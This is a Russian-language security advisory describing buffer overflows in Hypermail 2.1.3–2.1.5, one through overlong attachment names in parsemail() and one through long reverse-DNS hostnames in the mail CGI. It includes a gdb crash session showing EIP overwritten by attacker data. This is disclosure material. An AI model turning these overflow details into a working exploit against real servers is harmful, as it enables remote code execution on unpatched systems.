Множественные переполнения буфера в Hypermail

Как сообщается, удаленный атакующий может послать специально сформированное e-mail сообщение с чрезмерно длинным именем вложения (252 символа) к пользователю Hypermail системы, которое вызовет переполнение буфера. Переполнение происходит только в некотрых конфигурациях Hypermail системы (параметр progress равный 2). Переполнение находится в функции parsemail() в 'parse.c' файле и позволяет удаленному пользователю выполнить произвольный код на системе с привилегиями Hypermail процесса.

Согласно сообщению, в функции parsemail() обнаружено несколько переполнений буфера, которые не могут эксплуатироваться для выполнения произвольного кода. Также обнаружено переполнение буфера в 'mail' CGI компоненте в Hypermail. Переполнение происходит при выполнении обратного DNS поиска, если возвращаемое имя хоста больше 122 символов. Удаленный атакующий, контролирующий DNS сервер или способный подменить DNS запрос, может представить специально обработанной имя хоста, которое заставит mail CGI сценарий выполнить произвольный код. В заключение, mail CGI программа позволяет удаленному пользователю посылать e-mail к произвольным адресатам.

Уязвимость обнаружена в Hypermail 2.1.3, 2.1.4, 2.1.5

Пример:

$ cat /etc/redhat-release
Red Hat Linux release 7.3 (Valhalla)
$ uname -a
Linux h130n1flsxxoxxx.telia.com 2.4.18-19.7.x #1 Thu Dec 12 09:00:42
EST 2002 i686 unknown
$ pwd
/home/vsu/secwork/hypermail-2.1.5/src
$ ./hypermail -o progress=2 -m /var/spool/mail/vsu
 Creating directory "vsu", mode 755.
Loading mailbox "/var/spool/mail/vsu"...
 Creating directory "vsu//att-0000", mode 755.
   0 Created attachment file vsu//att-0000/01-UUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUU
Segmentation fault
$ rm -rf vsu
$ gdb hypermail
GNU gdb Red Hat Linux (5.2-2)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of it under
certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-redhat-linux"...
(gdb) r -o progress=2 -m /var/spool/mail/vsu
Starting program: /home/vsu/secwork/hypermail-2.1.5/src/hypermail -o
progress=2 -m /var/spool/mail/vsu
 Creating directory "vsu", mode 755.
Loading mailbox "/var/spool/mail/vsu"...
 Creating directory "vsu//att-0000", mode 755.
   0 Created attachment file vsu//att-0000/01-UUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
UUUUUUUUUUUUUUUUUUUUUU

Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()
(gdb) whe
#0  0x55555555 in ?? ()
Cannot access memory at address 0x55555555
(gdb) i r
eax            0x0      0
ecx            0x0      0
edx            0x0      0
ebx            0x55555555       1431655765
esp            0xbfffe870       0xbfffe870
ebp            0x55555555       0x55555555
esi            0x55555555       1431655765
edi            0x55555555       1431655765
eip            0x55555555       0x55555555
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
xmm0           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm1           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm2           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm3           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm4           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm5           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm6           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
xmm7           {f = {0x0, 0x0, 0x0, 0x0}}
{f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
mxcsr          0x1f80   8064
orig_eax       0xffffffff       -1
(gdb) q
The program is running.  Exit anyway? (y or n) y